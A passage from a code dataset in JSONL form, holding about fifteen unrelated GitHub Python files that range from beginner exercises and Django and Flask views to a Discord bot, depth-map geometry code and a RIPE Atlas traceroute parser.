    \"\n return msg\n\n\n# user\n\n\n@app.route(\"/user\")\n@app.route(\"/user/\")\ndef user_msg(user: T.Optional[str] = None):\n user = markupsafe.escape(user) if user is not None else None\n if user not in users:\n flask.abort(404)\n return f\"User {user} {messages[user]}\"\n","repo_name":"poppyargus/py-talk-flask-2023-04","sub_path":"pt2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"44348158450","text":"# 1. Create a route_info function to pass the dictionary to\n# 2. If the dictionary has a distance key and its value is an integer, return the string \"Distance to your destination is \".\n# 3. Otherwise, if the dictionary has speed and time keys, return the string \"Distance to your destination is \".\n# 4 Otherwise return the string \"No distance info is available\".\n# 5. Call the function several times with different arguments\n\n\ndef route_info(route):\n if ('distance' in route) and (type(route['distance']) == int):\n return f\"Distance to your destination is {route['distance']}\"\n\n if ('speed' in route) and ('time' in route):\n return f\"Distance to your destination is {route['speed'] * route['time']}\"\n\n return \"No distance info is available\"\n\n\nmy_dict_a = {\n 'distance': 200,\n 'speed': 60,\n 'time': 2,\n}\n\nmy_dict_b = {\n 'speed': 60,\n 'time': 2,\n}\n\nmy_dict_c = {\n 'transport': 'car',\n 'color': 'red',\n 'time': 2,\n}\n\n\nprint(route_info(my_dict_a))\nprint(route_info(my_dict_b))\nprint(route_info(my_dict_c))\n\n","repo_name":"exorive/Python","sub_path":"Udemy_HW_if_instructions.py","file_name":"Udemy_HW_if_instructions.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41447773636","text":"import nest\nimport sys\n\nnest.Install(\"cerebmodule\")\n\nVT = nest.Create(\"volume_transmitter_alberto\", 1)\n\nPRE = nest.Create(\"iaf_cond_exp\", 1)\nPOST = nest.Create(\"iaf_cond_exp\", 1)\n\nconn_param1 = {\"model\": 'stdp_synapse_sinexp',\n \"A_minus\": -0.01, # double - Amplitude of weight change for depression\n \"A_plus\": 0.01, # double - Amplitude of weight change for facilitation \n \"Wmin\": 0.0, # double - Minimal synaptic weight \n \"Wmax\": 4.0, # double - Maximal synaptic weight, \n \"weight\": 1.0,\n \"delay\": 1.0}\n\nnest.Connect(PRE,POST,{'rule': 'one_to_one'},conn_param1)\nA=nest.GetConnections(PRE,POST)\nnest.SetStatus(A,{'vt_num': 0})\n\nconn_param2 = {\"model\": 'stdp_synapse_cosexp',\n \"A_minus\": -0.01, # double - Amplitude of weight change for depression\n \"A_plus\": 0.01, # double - Amplitude of weight change for facilitation \n \"Wmin\": 0.0, # double - Minimal synaptic weight \n \"Wmax\": 4.0, # double - Maximal synaptic weight, \n \"weight\": 1.0,\n \"delay\": 1.0}\n\nnest.Connect(POST,PRE,{'rule': 'one_to_one'},conn_param2)\nA=nest.GetConnections(POST,PRE)\nnest.SetStatus(A,{'vt_num': 0})\n\nsys.exit(0) #Everything went fine\n","repo_name":"alberto-antonietti/CerebNEST","sub_path":"Tests/Check_Models.py","file_name":"Check_Models.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"70174951773","text":"val = float(input(\"Informe o valor a ser pago: \"))\ncond = int(input(\"Informe a condição de pagamento\"\n \"\\n[1]À Vista\\n[2]À Vista no cartão\\n[3]Em 2x no Cartão\\n[4]Em 3x ou mais no Cartão\\nDigite a opção: \"))\navi = val-(val*10)/100\navic = val-(val*5)/100\ncar2 = val\ncar3 = val+(val*20)/100\n\nif cond == 1:\n print(\"O valor do produto fica por: R${}\".format(avi))\nelif cond == 2:\n print(\"O valor do produto fica por: R${}\".format(avic))\nelif cond == 3:\n print(\"O valor do produto fica por: R${}\".format(val))\nelse:\n parc = int(input(\"Informe a quantidade de parcelas: \"))\n print(\"O valor sairá por: R${} em {} parcelas de R${}\".format(car3,parc,car3/parc))","repo_name":"GustavoJatene/practice","sub_path":"044.py","file_name":"044.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13588487354","text":"from http.client import HTTPResponse\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, Http404\nfrom news.models import News\nfrom .forms import NewsForm\n\ndef index(request, *args, **kwards):\n qs = News.objects.all()\n context = {'news_list': qs}\n return render(request, 'index.html', context)\n\ndef detail_view(request, pk):\n try:\n obj = News.objects.get(id=pk)\n except News.DoesNotExist:\n raise Http404\n \n print(request.POST)\n print(request.GET)\n print(request.method == \"POST\")\n print(request.method == \"GET\")\n\n return render(request, 'news/detail.html', {'single_object': obj})\n \n\n\n\n\ndef test_view(request, *args, **kwargs):\n print(request.GET)\n return HttpResponse(\"test view\")\n\ndef create_view(request, *args, **kwargs):\n form = NewsForm(request.POST or None)\n\n if form.is_valid():\n data = form.cleaned_data\n News.objects.create(**data)\n print(form.cleaned_data) \n return render(request, 'forms.html', {'form': form})\n\n\n\n \n\n","repo_name":"megamagomed/My-first-application","sub_path":"first_app/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42311992449","text":"import torch \n\n\ndef _create_frustum(depth_map, input_size, downsample):\n '''\n depth_map: B, N, n_depth, H, W \n '''\n # make grid in image plane\n n_depth = depth_map.shape[2]\n device = depth_map.device\n ogfH, ogfW = input_size\n fH, fW = ogfH // int(downsample), ogfW // int(downsample)\n assert fH == depth_map.shape[3] and fW == depth_map.shape[4], (fH, fW, depth_map.shape)\n ds = depth_map \n ds = ds.clamp(0.)\n B, N_cam, D, H, W = ds.shape\n xs = torch.linspace(0, ogfW - 1, fW, dtype=torch.float).view(1, 1, fW).expand(B, N_cam, D, fH, fW).to(device)\n ys = torch.linspace(0, ogfH - 1, fH, dtype=torch.float).view(1, fH, 1).expand(B, N_cam, D, fH, fW).to(device)\n\n # B, N_cam, D, H, W, 3\n frustum = torch.stack((xs, ys, ds), -1)\n return frustum\n\n\ndef get_geometry(frustum, rots, trans, intrins, post_rots, post_trans, offset=None):\n \"\"\"Determine the (x,y,z) locations (in the ego frame)\n of the points in the point cloud.\n Returns B x N x D x H/downsample x W/downsample x 3\n \"\"\"\n B, N, _ = trans.shape\n # undo post-transformation\n # B x N x D x H x W x 3\n points = frustum - post_trans.view(B, N, 1, 1, 1, 3)\n if offset is not None:\n _,D,H,W = offset.shape\n points[:,:,:,:,:,2] = points[:,:,:,:,:,2]+offset.view(B,N,D,H,W)\n points = torch.inverse(post_rots).view(B, N, 1, 1, 1, 3, 3).matmul(points.unsqueeze(-1))\n\n # cam_to_ego\n points = torch.cat((points[:, :, :, :, :, :2] * points[:, :, :, :, :, 2:3],\n points[:, :, :, :, :, 2:3]\n ), 5)\n if intrins.shape[3]==4: # for KITTI\n shift = intrins[:,:,:3,3]\n points = points - shift.view(B,N,1,1,1,3,1)\n intrins = intrins[:,:,:3,:3]\n combine = rots.matmul(torch.inverse(intrins))\n points = combine.view(B, N, 1, 1, 1, 3, 3).matmul(points).squeeze(-1)\n points += trans.view(B, N, 1, 1, 1, 3)\n\n # points_numpy = points.detach().cpu().numpy()\n return points\n\n\ndef _decorate_points(points_map, decoration_img): \n bs, n_cam, n_depth, h, w, _ = points_map.shape \n decoration_img = decoration_img.permute(0, 1, 3, 4, 2).unsqueeze(2) # shape: bs, n_cam, 1, h, w, 3\n decoration_img = decoration_img.expand((bs, n_cam, n_depth, h, w, 3))\n points_map = torch.cat((points_map, decoration_img), dim=-1) # shape: bs, n_cam, n_depth, h, w, 6. dimensions: x, y, z, r, g, b\n return points_map \n\ndef convert_depth_map_to_points(depth, input_size, downsample, rots, trans, intrins, post_rots, post_trans, decoration_img=None, return_batch_idx=True):\n bs, n_cam, n_depth, h, w = depth.shape\n # depth.shape == (bs, n_cam, n_depth, h, w)\n frustum = _create_frustum(depth, input_size, downsample)\n geom = get_geometry(frustum, rots, trans, intrins, post_rots, post_trans)\n\n if decoration_img is not None: \n geom = _decorate_points(geom, decoration_img)\n \n if return_batch_idx:\n geom = geom.view(-1, geom.shape[-1])\n\n batch_ix = torch.cat([torch.full([geom.shape[0] // bs, 1], ix,\n device=depth.device, dtype=torch.long) for ix in range(bs)])\n return geom, batch_ix\n else: \n geom = geom.view(bs, -1, geom.shape[-1])\n return geom \n\n","repo_name":"duanyiqun/DiffusionDepth","sub_path":"src/model/ops/depth_map_to_points.py","file_name":"depth_map_to_points.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"32"} +{"seq_id":"19779748142","text":"# https://programmers.co.kr/learn/courses/30/lessons/12977\nimport itertools\n\n\ndef solution(nums):\n answer = 0\n # itertools -> permutation(순열), combinations(조합)\n comb_list = itertools.combinations(nums, 3)\n\n for comb in comb_list:\n total = sum(comb)\n for i in range(2, total // 2 + 1):\n if total % i == 0:\n break\n else:\n answer += 1\n\n return answer\n","repo_name":"YAEJIN-JEONG/Algorithm","sub_path":"프로그래머스/Lv1. 소수 만들기/경진/Lv1. 소수 만들기.py","file_name":"Lv1. 소수 만들기.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"74367621852","text":"L = [3, 3, 1, 5, 4]\nlista = []\nfim = len(L)\nwhile fim > 1:\n trocou = False\n x = 0\n while x < (fim - 1):\n if L[x] > L[x + 1]:\n trocou = True\n temp = L[x]\n L[x] = L[x + 1]\n L[x + 1] = temp\n x += 1\n if not trocou:\n break\n fim -= 1\nfor e in L:\n lista.append(e)\n\nprint(lista)\n\n# O PROGRAMA FUNCIONARÁ DO MESMO JEITO, DEIXANDO OS\n# NUMERO EM ORDEM MESMO REPETIDO\n","repo_name":"yhammartes/Livro_Python","sub_path":"cap006/exer_15.py","file_name":"exer_15.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27385873875","text":"\"\"\"\nМеханика листа.\nПредоставляется функциональность добавления расчетных строк с ячейками, с последующей механикой расчета.\n\"\"\"\n\nfrom typing import Dict, Tuple, Union\n\nfrom excel.cell.cell import CellValue\nfrom excel.cell.expression_value import ExpressionValue\n\n\nclass Sheet:\n \"\"\"\n Лист\n \"\"\"\n\n def __init__(self, size_line: str):\n \"\"\"\n :param size_line: Строка задающая размер листа\n :raise: ValueError\n \"\"\"\n\n self._size: SheetSize = SheetSize.parser(size_line)\n self._cell_list: Dict[Tuple[int, int], Union[CellValue, str, int]] = {}\n\n def get_size(self) -> 'SheetSize':\n \"\"\"\n Получить размер листа\n \"\"\"\n\n return self._size\n\n def add_line(self, line: str):\n \"\"\"\n Добавить строку с ячейками\n\n :param line: Строка со значениями в ячейках\n :raise: ValueError\n \"\"\"\n\n error_text = f'Строка со ��начением ячеек должна содержать ' \\\n f'\"{self._size.x}\" выражений разделенных символом табуляции!'\n\n if not isinstance(line, str):\n raise ValueError(error_text)\n\n cell_value_list = line.split('\\t')\n if not (len(cell_value_list) == self._size.x):\n raise ValueError(error_text)\n\n if len(self._cell_list) >= self._size.y * self._size.x:\n raise ValueError('Достигнут предел размерности таблицы по вертикали!')\n\n # Заполнить текущую строку ячейками\n line_number = int(len(self._cell_list) / self._size.x) + 1\n for i, value in enumerate(cell_value_list):\n self._cell_list[(i + 1, line_number)] = CellValue.parser(value)\n\n def calculate(self) -> Dict[Tuple[int, int], Union[str, int]]:\n \"\"\"\n Рассчитать значения\n :return Ключом является кортеж (x, y), значением вычисленное выражение\n \"\"\"\n\n if not (len(self._cell_list) == (self._size.x * self._size.y)):\n raise RuntimeError(f'Инициализация не закончена. '\n f'Кол-во заданных ячеек \"{len(self._cell_list)}\" из \"{self._size.x * self._size.y}\"')\n\n sheet_cell_value = {}\n\n # Вычислить результат для всех не выражений.\n for key, cell_value in self._cell_list.items():\n sheet_cell_value[key] = \\\n cell_value.get_value() if not isinstance(cell_value, ExpressionValue) else cell_value\n\n # Вычислить результат для всех выражений.\n for key, cell_value in sheet_cell_value.items():\n if isinstance(cell_value, ExpressionValue):\n cell_value.calc(key, sheet_cell_value)\n\n return sheet_cell_value\n\n\nclass SheetSize:\n \"\"\"\n Размер листа.\n\n Максимальные размеры листа расчитываются исходя из утверждения\n 'Ссылки на ячейки состоят из одной латинской буквы и следующей за ней цифры'.\n \"\"\"\n\n MAX_Y = 9\n \"\"\"\n Максимальный размер листа по вертикали (1-9)\n \"\"\"\n\n MAX_X = 26\n \"\"\"\n Максимальный размер листа по горизонтали (A-Z)\n \"\"\"\n\n def __init__(self, y: int, x: int):\n \"\"\"\n :param y: Размер по вертикали\n :param x: Размер по горизонтали\n\n :raise: ValueError\n \"\"\"\n\n if not(isinstance(y, int) and 0 < y <= self.MAX_Y):\n raise ValueError(f'Размер по вертикали должен лежать в диапазоне 1-{self.MAX_Y}!')\n self._y: int = y\n\n if not(isinstance(x, int) and 0 < x <= self.MAX_X):\n raise ValueError(f'Размер по горизонтали должен лежать в диапазоне 1-{self.MAX_X}!')\n self._x: int = x\n\n @property\n def y(self) -> int:\n \"\"\"\n Получить размер по вертикали\n \"\"\"\n return self._y\n\n @property\n def x(self) -> int:\n \"\"\"\n Получить размер по горизонтали.\n \"\"\"\n return self._x\n\n @classmethod\n def parser(cls, line: str) -> 'SheetSize':\n \"\"\"\n Разобрать размер листа\n\n :param line: Строка (в формате Y\\tX)\n :raises ValueError:\n \"\"\"\n\n error_text = f'Строка с размером листа должна быть в формате \"<1-{cls.MAX_Y}>/t<1-{cls.MAX_X}>\"!'\n\n if not (isinstance(line, str) and line):\n raise ValueError(error_text)\n\n values = line.split('\\t')\n if not (len(values) == 2 and values[0].isdigit() and values[1].isdigit()):\n raise ValueError(error_text)\n\n return SheetSize(int(values[0]), int(values[1]))\n","repo_name":"musohranov/excel","sub_path":"src/excel/sheet.py","file_name":"sheet.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30303332198","text":"from .PhysicsEntity import PhysicsEntity\nfrom pygame import Rect, Surface\nimport math\nimport pygame\n\n\nclass Bullet(PhysicsEntity):\n def __init__(self, origin_pos, target_pos, lifetime, bullet_image=None, damage=1, base_velocity=5, **kwargs):\n\n x = target_pos[0] - origin_pos[0]\n y = target_pos[1] - origin_pos[1]\n direction = math.atan2(y,x)\n x_velocity = math.cos(direction) * base_velocity\n y_velocity = math.sin(direction) * base_velocity\n\n bullet_image = Surface((8, 8), pygame.SRCALPHA)\n bullet_image.fill((0, 0, 0, 0))\n pygame.draw.circle(bullet_image, (255, 200, 0), (4, 4), 4)\n\n rect = Rect(origin_pos, bullet_image.get_size())\n self.lifetime = lifetime\n super(Bullet, self).__init__(rect=rect, image=bullet_image, gravity=0,\n x_velocity=x_velocity, y_velocity=y_velocity, **kwargs)\n\n def update(self, **kwargs):\n self.lifetime -= 1\n super(Bullet, self).update(**kwargs)\n\n def gone(self, tick):\n return self.lifetime < 0\n","repo_name":"eustaceb/gu-gamejam2017","sub_path":"src/game_objects/Bullet.py","file_name":"Bullet.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70559198170","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 29 18:04:18 2014\n\n@author: Bing Liu\n\"\"\"\nfrom random import random\nfrom random import randint\nimport collections\n\ndef read_configuration(file_name):\n f_r = open(file_name, 'rb')\n ordered_dict = collections.OrderedDict()\n\n for line in f_r:\n sentence_type = line.split(';')[0]\n sentence_description = line.split(';')[1]\n sentence_num = int(line.split(';')[2]) \n ordered_dict[sentence_type + ':' + sentence_description] = sentence_num\n f_r.close()\n return ordered_dict \n\ndef weighted_random(weights_dict):\n number = random()*sum(weights_dict.values())\n for k,v in weights_dict.iteritems():\n if number < v:\n break\n number -= v\n return k\n\ndef random_ele(ele_list):\n return ele_list[randint(0, len(ele_list)-1)]\n\ndef read_weighted_dict(file_name):\n f_r = open(file_name, 'rb')\n weighted_dict = {}\n\n for line in f_r:\n ele = line.split('\\t')[0]\n weight = float(line.split('\\t')[1]) \n weighted_dict[ele] = weight\n f_r.close()\n return weighted_dict\n\ndef read_list(file_name):\n f_r = open(file_name, 'rb')\n ele_list = list()\n\n for line in f_r:\n ele_list.append(line.strip())\n f_r.close()\n return ele_list\n\ndef read_person_names(file_name, name_accu_prob_threshold): \n accu_prob_threshold = name_accu_prob_threshold\n # read female first names from file\n f_r = open(file_name, 'rb')\n name_dist = {}\n \n prob = 0\n for line in f_r:\n name = line.split()[0].title()\n accu = float(line.split()[2])\n if (accu < accu_prob_threshold):\n prob = float(line.split()[1]) \n name_dist[name] = prob\n f_r.close()\n return name_dist\n","repo_name":"HadoopIt/Sentence-Generator","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"6205061255","text":"import discord\nimport os\nimport pymongo\nfrom discord.ext import commands\nfrom keep_alive import keep_alive\n\n\nintents = discord.Intents.default()\nallowed_mentions = discord.AllowedMentions(everyone=False, roles=False)\nintents.members = True\nbot = commands.Bot(command_prefix=commands.when_mentioned_or('eto '), intents=intents, help_command=None, allowed_mentions = allowed_mentions)\ntoken = os.environ.get(\"Bot_Token\")\ndb = pymongo.MongoClient(os.environ['Mongo-DB-secret'])\nif db:\n print(\"Successfully connected to Singapore database.\")\nelse:\n raise \"Could not connect to Singapore database\"\n\nfor extension in os.listdir(\"extensions\"):\n if extension.endswith(\".py\"):\n bot.load_extension(f\"extensions.{extension[:len(extension)-3]}\")\n\n@bot.command(name=\"reload\", description=\"Reloads an extension\")\n@commands.has_permissions(administrator=True)\nasync def reload(ctx, extension=None):\n if extension==None:\n for extension in bot.extensions.copy():\n bot.reload_extension(f\"extensions.{extension}\")\n await ctx.send(\"Reloaded cozyeto\")\n print(\"Reloaded cozyeto\")\n else:\n bot.reload_extension(f\"extensions.{extension}\")\n await ctx.send(\"Done\")\n print(f\"Reloaded {extension}\")\n\n\n@reload.error\nasync def reload_error(ctx, error):\n if isinstance(error, commands.ExtensionNotFound):\n await ctx.send(\"Could not find that cog\")\n else:\n await ctx.send(\"Could not reload that cog\")\n raise error\n\n\n@bot.event\nasync def on_ready():\n print('Online!')\n\n\nkeep_alive()\nbot.run(token)","repo_name":"WillingGithubDude/Cozyeto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36933143865","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\n\n\ndataset = pd.read_csv(\"data/data.csv\", sep=\",\")\n\ndef label_encoding(df):\n le = LabelEncoder()\n df['diagnosis'] = le.fit_transform(df['diagnosis'])\n return df\n\ndef test_diagnosis_column_():\n dataset = pd.read_csv(\"data/data.csv\", sep=\",\")\n dataset = label_encoding(dataset)\n assert dataset['diagnosis'].dtypes == 'int'\n\n\ndef test_values_diagnosis_column_():\n dataset = pd.read_csv(\"data/data.csv\", sep=\",\")\n dataset = label_encoding(dataset)\n assert dataset['diagnosis'].isin([0,1]).all() == True\n\n\n\n\n\n","repo_name":"Kibika/Causal_Inference","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26488035257","text":"# https://programmers.co.kr/learn/courses/30/lessons/72411\nfrom itertools import combinations\nfrom collections import Counter\n\ndef solution(orders, course):\n result = []\n for i in course:\n ord_com = []\n for order in orders:\n ord_com += combinations(sorted(order), i)\n most_ordered = Counter(ord_com).most_common()\n result += [ combi for combi, num in most_ordered if num > 1 and num == most_ordered[0][1]]\n return [ ''.join(i) for i in sorted(result)]\n\n'''\norders\t course\tresult\n[\"ABCFG\", \"AC\", \"CDE\", \"ACDE\", \"BCFG\", \"ACDEH\"]\t [2,3,4]\t[\"AC\", \"ACDE\", \"BCFG\", \"CDE\"]\n[\"ABCDE\", \"AB\", \"CD\", \"ADE\", \"XYZ\", \"XYZ\", \"ACD\"]\t[2,3,5]\t[\"ACD\", \"AD\", \"ADE\", \"CD\", \"XYZ\"]\n[\"XYZ\", \"XWY\", \"WXA\"]\t [2,3,4]\t[\"WX\", \"XY\"]\n'''\n","repo_name":"bigdatachobo/Study","sub_path":"Coding_Test/Programmers/Kakao_2021_coding_test/2번_메뉴_리뉴얼.py","file_name":"2번_메뉴_리뉴얼.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"11952415820","text":"import json, string, sys, copy, ipaddress\n\nimport traceroute as tr\nimport timebins\n\ndebug_traces = False\n#t_addr = \"178.49.128.6\" # In trace 2, hop 5\nt_addr = \"81.23.23.77\"\n\ndef p_trace(nt, hops): #IC in_counts testing\n print(\"trace %d\" % nt)\n for hn,h in enumerate(hops):\n for rn,r in enumerate(h.responders):\n marker = \"\"\n adr = str(r.ip_add)\n if adr == t_addr:\n marker = \" <<<\"\n if rn == 0:\n print(\" %2d: %s (%d) %s\" % (\n hn, adr, len(r.rtts), marker))\n else:\n print(\" : %s (%d) %s\" % (\n adr, len(r.rtts), marker))\n\ndef read_tr_file(tb, f_tb_n, j_line, mx_traces):\n # mx_traces zero -> read whole file\n # Reads Traces into tb.bins[f_tb_n], i.e. for timein tb_n\n # Each line contains data from start_ to stop_time, i.e.one timebin\n empty_traces = too_short_traces = nt = 0\n ta = [] # Append traces from file to ta\n results = json.loads(j_line) # Reads all traces for tb\n for pr in results: # Probe\n #if nt % 1000 == 0:\n # sys.stdout.write(\". \"); sys.stdout.flush()\n msm_id = int( pr['msm_id'])\n prb_id = int( pr['prb_id'])\n ts = int( pr['timestamp'])\n bin_nbr = tb.bin_nbr(ts)\n nt += 1\n #if nt <= 4:\n # print(\"rtf: nt %d, ts %d, bin %d\" % (nt, ts, bin_nbr))\n #if bin_nbr == 2:\n # exit()\n dest = \"?\"; empty_traces = too_short_traces = 0\n dest = ipaddress.ip_address(pr['dst_addr'])\n #print(\"=== nt=%d, f_tb_n=%d, msm_id=%d, probe_id=%d, src=%s, ts=%d, >bin_nbr %d<, dest=%s, proto=%s\" %(\n # nt, f_tb_n, msm_id, prb_id, pr['src_addr'], ts, bin_nbr, dest, pr['proto']))\n\n hops = []; empty_hops = 0\n result = pr['result']\n for h in result: # Hops in prb_id result\n hn = h['hop']\n #sys.stdout.write(\"%6d \" % hn)\n if not 'result' in h:\n if 'error' in h:\n if h['error'].find(\"Network is unreachable\") != -1:\n continue # No traceroute for this probe\n print(\" Error: prb_id=%d, %s\" % (prb_id, h['error']))\n else:\n print(\">>> prb_id=%d, No 'result' and no 'error'\" % prb_id)\n continue\n resp_d = {}; loss = 0\n res = h['result']; rx = 0\n while rx < len(res): # Packets in Hop\n p = res[rx]\n #print(\"@@ 1: p = %s\" % p)\n addr = rtt = None\n if 'from' in p: # From address?\n addr = ipaddress.ip_address(p['from'])\n #print(\"@@ 2: addr = %s (%s)\" % (addr, type(addr)))\n if 'late' in p and rx < len(res)-1:\n np = res[rx+1]\n if 'x' in np: # 'from' followed by 'x'\n rtt = np['x'].encode('ascii','replace')\n rx += 1\n else:\n rtt = 'L'\n loss += 1\n else:\n if 'rtt' in p: # Get an rtt\n rtt = p['rtt']\n else:\n rtt = '?'\n loss += 1\n else: # No 'from'\n #if 'x' in p: # lone 'x'\n # rtt = p['x'].encode('ascii','replace')\n loss += 1\n if addr:\n if addr in resp_d:\n resp_d[addr].rtts.append(rtt)\n else:\n resp_d[addr] = tr.Responder(addr, [rtt])\n rx += 1\n resp_a = list(resp_d.values()) # List of responders\n if len(resp_a) == 0: \n empty_hops += 1\n hops.append(tr.Hop(hn, loss, resp_a))\n \n #for hn,h in enumerate(hops): # Look for t_addr\n # for r in h.responders:\n # if str(r.ip_addr) == t_addr:\n # p_trace(nt, hops)\n\n if len(hops) == empty_hops: # No valid hops\n empty_traces += 1\n elif len(hops)-empty_hops < 3: # cleanup_trace() needs 2 valid hops\n too_short_traces += 1\n else:\n t = tr.Trace(msm_id, prb_id, ts, dest, hops)\n # ts from sample in a half-hour json record may be outside\n # the bin by >~ 1 second!\n if bin_nbr >= len(tb.bins):\n print(\"+++ f_tb_n = %d, len(tb.bins) = %d\" % (\n f_tb_n, len(tb.bins)))\n else: # Bin nbr in range [0:n_bins-1]\n ta.append(t)\n\n #print(\"BIN_NBR %d, f_tb_n %d\" % (bin_nbr, f_tb_n))\n return ta, nt, bin_nbr, dest, empty_traces, too_short_traces\n\ndef cleanup_trace(t, tn): # tn = index in bin\n # Remove rfc1918 addresses, and duplicate responder address\n bad = False # Has rfc1918 address or recurring addresses\n if len(t.hops) == 0:\n return 0, 0, 0, 0,0, 0\n \n n_1918_deleted = addrs_deleted = hops_deleted = 0\n total_addrs = total_hops = 0\n if debug_traces: # Before\n print(\"Before\")\n print(\"Trace %d: ts=%d, dest=%s\" % (tn, t.ts, t.dest))\n for j,h in enumerate(t.hops):\n h.print_hop(j)\n print() \n cycle = 0\n while True: # Repeat until all duplicates are removed\n cycle += 1\n #print(\"cycle %d\" % cycle)\n if len(t.hops) > 0:\n d_empties = [] # Remove empty hops\n for hx,h in enumerate(t.hops):\n if len(h.responders) == 0:\n d_empties.append(hx)\n for hx in range(len(d_empties)-1, -1, -1):\n t.hops.pop(d_empties[hx])\n\n bad = False\n # Remove rfc_1918 responders in last hop\n d_dups = []; d_addrs = []\n if len(t.hops) > 0:\n #t.print_trace()\n for n,dr in enumerate(t.hops[-1].responders):\n # if dr.ip_addr.is_rfc1918: << using plt / python-libtrace\n dr_ipa = ipaddress.ip_address(dr.ip_addr)\n if dr_ipa.is_private:\n d_dups.append(-1); d_addrs.append(str(dr_ipa))\n n_1918_deleted += 1\n for j in range(len(d_dups)):\n t.hops[-1].responders.pop(d_dups[j])\n bad = True\n for hx in range(len(t.hops)-2, -1, -1): # Keep last occurrence\n # Remove duplicate and rfc_1918 responders in earlier hops\n sra = t.hops[hx].responders # Responders for previous hop (hx)\n dra = t.hops[hx+1].responders # Responders for this hop (hx+1)\n s_dups = []; s_addrs = []\n for dr in dra:\n dr_ipa = ipaddress.ip_address(dr.ip_addr)\n for x,sr in enumerate(sra):\n # if sr.ip_addr.is_rfc1918: << using plt / python-libtrace\n sr_ipa = ipaddress.ip_address(sr.ip_addr)\n if sr_ipa.is_private:\n n_1918_deleted += 1\n if sr_ipa == dr_ipa or sr_ipa.is_private:\n if not str(sr.ip_addr) in s_addrs:\n s_dups.append(x); s_addrs.append(str(sr.ip_addr))\n total_addrs += len(dra)\n if len(s_dups) > 0:\n if debug_traces:\n print(\"trace %d, hx %d, s_dups %s, s_addrs %s\" % (\n tn, hx, s_dups, s_addrs))\n ss_dups = sorted(s_dups)\n for x in range(len(ss_dups)-1, -1, -1):\n sra.pop(ss_dups[x])\n addrs_deleted += len(s_dups)\n bad = True\n total_hops += len(t.hops)\n\n if debug_traces: # After removing empty hops\n print(\"Trace %d: ts=%d, dest=%s, cycle=%d\" % (\n tn, t.ts, t.dest, cycle))\n for j,h in enumerate(t.hops):\n h.print_hop(j)\n print()\n\n if bad:\n for hx in range(len(t.hops)-1, -1, -1):\n if len(t.hops[hx].responders) == 0:\n t.hops.pop(hx)\n hops_deleted += 1\n else:\n break\n\n#? # Delete all but the last mx_hops+1 hops\n#? mx_hops = len(t.hops)\n#? if len(t.hops) > mx_hops+1:\n#? new_hops = t.hops[-(mx_hops+1):]\n#? t.hops = new_hops\n\n # Check for loops in the trace\n resp_addrs = []\n for j,h in enumerate(t.hops):\n for r in h.responders:\n resp_addrs.append(r.ip_addr)\n for j,a in enumerate(resp_addrs):\n if j < len(resp_addrs)-1:\n if resp_addrs[j+1] == a:\n print(\">>> loop in trace %i, j = %2i; %s\" % (\n tn, j, resp_addrs[j+1]))\n\n succ = False\n if len(t.hops) > 0:\n last_responders = t.hops[-1].responders\n #&print(\"tn=%d, last_responders=>%s<, t.dest=>%s<\" % (tn, last_responders, t.dest))\n if len(last_responders) == 1:\n succ = last_responders[0].ip_addr == t.dest\n #print(\"=== deleted: 1918 %d, addrs %d, hops %d, total_hops %d\" % (\n # n_1918_deleted, addrs_deleted, hops_deleted, total_hops))\n\n return n_1918_deleted, addrs_deleted, hops_deleted, \\\n total_addrs, total_hops, succ\n\ndef cleanup_bin(tb, bn):\n if bn >= len(tb.bins): # Ignore bins outside range [0:n_bins-1]\n return\n t_traces = t_1918_deleted = t_addrs_deleted = t_hops_deleted = 0\n t_addrs = t_hops = t_succ = 0\n #print(\"cleanup_bin(%d), tb=%s\" % (bn, tb))\n for tn,t in enumerate(tb.bins[bn]):\n t_traces += 1\n if t_traces % 1000 == 0:\n sys.stdout.write(\"- \"); sys.stdout.flush()\n #print(\"bn=%d, tn=%d, t = %s\" % (bn, tn, t))\n n_1918_deleted, addrs_deleted, hops_deleted, n_addrs, \\\n n_hops, succ = cleanup_trace(t, tn)\n\n t_1918_deleted += n_1918_deleted\n t_addrs_deleted += addrs_deleted\n t_hops_deleted += hops_deleted\n t_addrs += n_addrs\n t_hops += n_hops\n if succ:\n t_succ += 1\n print(\"*** tot_traces %d, tot_addrs %d, tot_hops %d, tot_succ %d\" % (\n t_traces, 